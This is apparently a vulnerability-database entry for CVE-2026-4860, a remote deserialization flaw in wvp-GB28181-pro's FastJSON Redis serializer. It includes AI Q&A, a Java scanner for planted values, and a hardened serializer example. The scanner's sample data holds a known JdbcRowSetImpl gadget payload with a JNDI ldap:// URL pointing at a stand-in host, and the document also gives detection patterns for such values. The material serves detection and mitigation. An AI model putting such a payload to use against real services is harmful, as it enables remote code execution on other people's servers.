CVE-2026-4860
Status: Received - Intake
Remote Deserialization Vulnerability in wvp-GB28181-pro API Endpoint

Publication date: 2026-03-26

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security flaw has been discovered in 648540858 wvp-GB28181-pro up to version 2.7.4. It affects the GenericFastJsonRedisSerializer configured in src/main/java/com/genersoft/iot/vmp/conf/redis/RedisTemplateConfig.java and is reachable through the API Endpoint component. Manipulated input leads to deserialization of untrusted data. The attack can be launched remotely. An exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
Meta Information
Published: 2026-03-26
Last Modified: 2026-04-29
Generated: 2026-05-07
AI Q&A: 2026-03-26
EPSS Evaluated: 2026-05-05
External references: NVD, EUVD
Affected Vendors & Products
Showing 3 associated CPEs

Vendor          Product       Version / Range
fastjson        fastjson      2.0.57
spring_project  spring_boot   *
redis           redis         *

Note: these CPEs name dependencies of wvp-GB28181-pro (FastJSON, Spring Boot, Redis) rather than the product itself; the affected range stated in the description is wvp-GB28181-pro up to version 2.7.4.
CWE ID Description
CWE-20 The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
CWE-502 The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
AI Powered Q&A
How can this vulnerability impact me?

Successful exploitation gives the attacker code execution on the server that runs wvp-GB28181-pro. The description states that the attack can be launched remotely; whether it needs credentials depends on which API endpoint lets the attacker write the malicious value into Redis, so treat it as unauthenticated unless you have verified that every such endpoint is protected.

  • Confidentiality: code execution on the host exposes everything the application can reach, including the state cached in Redis (device and session records, credentials, configuration) and the video the platform relays.
  • Integrity: attackers can alter application state, stream routing, user permissions and stored records, or plant further payloads.
  • Availability: attackers can crash the application, interrupt video streaming, delete data, or use the host as a pivot for lateral movement.

In a video surveillance deployment this translates into manipulated or blacked-out live feeds, cameras taken offline, and a compromised foothold inside the physical-security network.


Can you explain this vulnerability to me?

CVE-2026-4860 is a remote code execution (RCE) vulnerability in wvp-GB28181-pro up to and including version 2.7.4. The RedisTemplate configuration in src/main/java/com/genersoft/iot/vmp/conf/redis/RedisTemplateConfig.java uses FastJSON's GenericFastJsonRedisSerializer, whose default constructor enables AutoType: when a stored JSON value carries an "@type" field, the serializer instantiates the class that field names instead of a type chosen by the application. Letting the data pick the class is the defining condition of CWE-502.

The attack therefore has two halves. First, the attacker gets a crafted JSON document into Redis through an API endpoint that writes request data there. Second, when any of the service classes later reads that key back, FastJSON deserializes it, resolves the "@type" value and instantiates the attacker-chosen class; a class whose constructor or setters have side effects (the classic FastJSON gadget chains) turns that into code execution on the server. Whether this works without authentication depends on whether the write path is exposed unauthenticated; the advisory only states that the attack can be launched remotely.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Look for stored values and API requests whose JSON contains an "@type" key naming a class outside the application's own package (the advisory's file path puts that package under com.genersoft.iot.vmp), in particular known gadget classes such as JdbcRowSetImpl, and for JNDI URLs (ldap://, ldaps://, rmi://) embedded in those values.

Indicators on a host that has already been hit include unexpected Redis key structures, outbound LDAP, RMI or DNS connections from the Java process, the Java process spawning child processes it never normally starts, and deserialization errors or crashes logged during Redis reads.

Suggested detection commands and methods include:

  • Enumerate keys with `redis-cli --scan` (cursor-based; avoid `KEYS '*'` on a production instance, it blocks the server while it walks the whole keyspace), then inspect values with `redis-cli GET <key>` (or `HGETALL` for hashes) and grep them for `"@type"` and JNDI URLs.
  • Capture outbound traffic from the application host with `tcpdump` or Wireshark, filtering on ports 389/636 (LDAP), 1099 (RMI) and 53 (DNS); a service that normally talks only to Redis, its database and cameras should not open such connections.
  • Check application logs for deserialization errors or unexpected behaviour during Redis reads.
  • Implement Sigma rules (or equivalent) for outbound JNDI connections from Java processes and for unexpected child processes of the JVM.
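The scanner below is an added example, not part of the advisory or the wvp-GB28181-pro project. It applies the indicators listed above to stored Redis values: an "@type" key naming a class outside the application's package (the prefix is taken from the advisory's file path) and ldap://, ldaps:// or rmi:// URLs. By default it runs on constructed sample values; the keys, values and device ID in them are made up. With "-" as the only argument it reads one value per line from stdin, so it can be fed from redis-cli (that pipeline is an assumption about your deployment).

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class RedisAutoTypeScanner {

    /** Package the application legitimately stores, taken from the advisory's file path. */
    static final String TRUSTED_PREFIX = "com.genersoft.iot.vmp.";

    /** "@type" key (any whitespace around the colon) with a string value. */
    static final Pattern TYPE_KEY = Pattern.compile("\"@type\"\\s*:\\s*\"([^\"]+)\"");

    /** JNDI lookup schemes named in the advisory as indicators. */
    static final Pattern JNDI_URL = Pattern.compile("(?i)\\b(?:ldaps?|rmi)://[^\"\\s]+");

    /** Findings for one stored value; an empty list means nothing suspicious was seen. */
    static List<String> scanValue(String key, String value) {
        List<String> findings = new ArrayList<>();
        Matcher t = TYPE_KEY.matcher(value);
        while (t.find()) {
            String cls = t.group(1);
            if (!cls.startsWith(TRUSTED_PREFIX)) {
                findings.add(key + ": @type names out-of-package class " + cls);
            }
        }
        Matcher j = JNDI_URL.matcher(value);
        while (j.find()) {
            findings.add(key + ": JNDI-style URL " + j.group());
        }
        return findings;
    }

    /** Constructed samples (hypothetical keys, class names and values, not real data). */
    static List<String[]> samples() {
        List<String[]> s = new ArrayList<>();
        // Benign: the application's own class, so @type is expected here.
        s.add(new String[] {"device:34020000001320000001",
            "{\"@type\":\"com.genersoft.iot.vmp.SomeBean\",\"deviceId\":\"34020000001320000001\"}"});
        // Planted: gadget class plus a JNDI URL, the pattern the advisory names.
        s.add(new String[] {"session:7f3a",
            "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://203.0.113.10:1389/a\"}"});
        // Planted: out-of-package JDK type with spacing meant to dodge a naive grep.
        s.add(new String[] {"cache:x",
            "{ \"@type\" : \"java.lang.AutoCloseable\", \"x\": 1 }"});
        return s;
    }

    public static void main(String[] args) throws IOException {
        List<String[]> entries;
        if (args.length == 1 && "-".equals(args[0])) {
            // One value per line on stdin; keys are not available in this mode.
            entries = new ArrayList<>();
            BufferedReader in = new BufferedReader(
                    new InputStreamReader(System.in, StandardCharsets.UTF_8));
            String line;
            int n = 0;
            while ((line = in.readLine()) != null) {
                entries.add(new String[] {"stdin#" + (++n), line});
            }
        } else {
            entries = samples();
        }
        int hits = 0;
        for (String[] e : entries) {
            for (String f : scanValue(e[0], e[1])) {
                System.out.println(f);
                hits++;
            }
        }
        System.out.println(hits == 0 ? "no suspicious values" : hits + " finding(s)");
        System.exit(hits == 0 ? 0 : 2);
    }
}
```

Feed it live data with `redis-cli --scan | while read -r k; do redis-cli GET "$k"; done | java RedisAutoTypeScanner.java -` (JDK 11 or later runs a single source file directly). GET only works for string keys; dump hashes with HGETALL. The same two patterns applied to API request bodies at a reverse proxy catch payloads before they are stored.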

What immediate steps should I take to mitigate this vulnerability?

Change the FastJSON serializer configuration used by the Redis template so that stored data can no longer choose the class to instantiate: disable AutoType, or restrict it to an accept list limited to the application's own packages. Do not rely on FastJSON's built-in denylist; it has been bypassed repeatedly and is not a mitigation on its own. This is the fix that matters, because it removes the vulnerable behaviour on the read side regardless of how a payload reached Redis.

Additionally, validate JSON data before it is written to Redis and reject values whose "@type" key names a class outside the application's packages, bearing in mind that this only helps if every write path is covered.

Update FastJSON to a current release. That closes known gadget bypasses but does not make AutoType safe, so the configuration change above is still required. Harden the API endpoints by requiring authentication and limiting write access, and make sure Redis itself is not reachable from untrusted networks, since anyone who can write a key can trigger the same deserialization.

Monitor Redis logs and network traffic for suspicious activity as part of ongoing defence.
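The following Java is an added example, not code from the wvp-GB28181-pro repository or the advisory. It places the weak RedisTemplate value-serializer setup described in the explanation above next to the hardened one recommended in the mitigation, then checks both against a planted value. It assumes fastjson2 (the CPE row lists fastjson 2.0.57) with its Spring Data Redis support module and spring-data-redis on the classpath; the NotAllowed bean, the method names and the planted value are constructed for the demonstration, and the accept-list prefix is taken from the advisory's file path. Confirm the constructor semantics against the exact fastjson2 version you pin before adopting it.

```java
import com.alibaba.fastjson2.support.spring.data.redis.GenericFastJsonRedisSerializer;
import org.springframework.data.redis.connection.RedisConnectionFactory;
import org.springframework.data.redis.core.RedisTemplate;
import org.springframework.data.redis.serializer.RedisSerializer;
import org.springframework.data.redis.serializer.StringRedisSerializer;

import java.nio.charset.StandardCharsets;

public class RedisSerializerHardening {

    /** Harmless bean standing in for "any class on the classpath" (hypothetical). */
    public static class NotAllowed {
        public String marker;
    }

    /** WEAK: the no-arg constructor enables JSONReader.Feature.SupportAutoType,
     *  so the "@type" key inside a stored value picks the class to instantiate. */
    static RedisSerializer<Object> weakValueSerializer() {
        return new GenericFastJsonRedisSerializer();
    }

    /** HARDENED: the accept-list constructor installs JSONReader.autoTypeFilter(prefixes)
     *  instead of SupportAutoType, so "@type" resolves only under the listed prefixes.
     *  The prefix comes from the advisory's file path (com/genersoft/iot/vmp/...). */
    static RedisSerializer<Object> hardenedValueSerializer() {
        return new GenericFastJsonRedisSerializer(new String[] {"com.genersoft.iot.vmp."});
    }

    /** Wires a value serializer into a RedisTemplate the way a Spring @Bean method would. */
    static RedisTemplate<String, Object> redisTemplate(RedisConnectionFactory factory,
                                                       RedisSerializer<Object> values) {
        RedisTemplate<String, Object> template = new RedisTemplate<>();
        template.setConnectionFactory(factory);
        template.setKeySerializer(new StringRedisSerializer());
        template.setHashKeySerializer(new StringRedisSerializer());
        template.setValueSerializer(values);
        template.setHashValueSerializer(values);
        template.afterPropertiesSet();
        return template;
    }

    /** True if deserializing `stored` with `s` produced a NotAllowed instance. A refusal
     *  surfaces as SerializationException (a RuntimeException) and counts as "no". */
    static boolean instantiatesNotAllowed(RedisSerializer<Object> s, byte[] stored) {
        try {
            return s.deserialize(stored) instanceof NotAllowed;
        } catch (RuntimeException refused) {
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample: the kind of value an attacker plants through a write
        // endpoint. Here "@type" names our harmless bean; a real payload names a gadget.
        String planted = "{\"@type\":\"" + NotAllowed.class.getName() + "\",\"marker\":\"x\"}";
        byte[] stored = planted.getBytes(StandardCharsets.UTF_8);

        boolean weakHit = instantiatesNotAllowed(weakValueSerializer(), stored);
        boolean hardenedHit = instantiatesNotAllowed(hardenedValueSerializer(), stored);
        System.out.println("default serializer instantiated attacker-chosen class: " + weakHit);
        System.out.println("accept-list serializer instantiated it: " + hardenedHit);
        System.out.println(weakHit && !hardenedHit
                ? "accept list blocks out-of-package @type"
                : "unexpected result; check the fastjson2 version in use");
    }
}
```

main() needs no Redis server because it calls the serializers directly. In the project's RedisTemplateConfig the only change is the serializer handed to setValueSerializer and setHashValueSerializer. Where every key holds one known type, a serializer bound to a concrete class (for example fastjson2's FastJsonRedisSerializer<T>) is the stricter option, since the type is then chosen by code rather than by data.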


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

CVE-2026-4860 enables remote code execution leading to full confidentiality, integrity, and availability compromise of the affected system. Attackers can read sensitive data stored in Redis, including credentials and video streams, modify application state and user permissions, and disrupt services.

Such a breach can result in unauthorized access to personal and sensitive information, violating data protection regulations like GDPR and HIPAA that mandate strict controls over data confidentiality and integrity.

The vulnerability's impact on data confidentiality and integrity, combined with the potential for service disruption, means organizations using the affected software may fail to meet compliance requirements related to data security, breach notification, and system availability.

